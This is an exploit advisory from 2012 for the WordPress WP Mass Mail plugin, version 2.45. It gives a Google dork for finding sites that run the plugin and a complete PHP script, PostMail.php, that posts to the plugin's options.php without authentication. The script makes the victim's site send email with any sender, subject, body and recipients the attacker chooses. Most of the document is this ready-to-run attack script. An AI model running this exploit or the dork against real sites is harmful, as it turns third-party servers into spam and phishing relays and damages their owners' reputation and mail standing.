WordPress WP Mass Mail plugin version 2.45 suffers from a mass mailing vulnerability without authentication.
0f4be0ffd42eb19f066e86086bff871699469bded9dcd5440d843fc3d87aa66b
##################################################
# Description : Wordpress Plugins - WP Mass Mail Send Mass Email
Vulnerability
# Version : 2.45
# Link : http://wordpress.org/extend/plugins/wp-mass-mail/
# Plugins : http://downloads.wordpress.org/plugin/wp-mass-mail.zip
# Date : 26-05-2012
# Google Dork : inurl:/wp-content/plugins/wp-mass-mail/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################
Exploit : Send Mass Email
PostMail.php
<?php
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wp-mass-mail/options.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('send'=>"send",
'subject'=>'test',
'name'=>'true',
'from'=>'test@exemple.com',
'body'=>'body',
'address1'=>'test1@exemple.com',
'address2'=>'test2@exemple.com',
'reply'=>'test@exemple.com'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>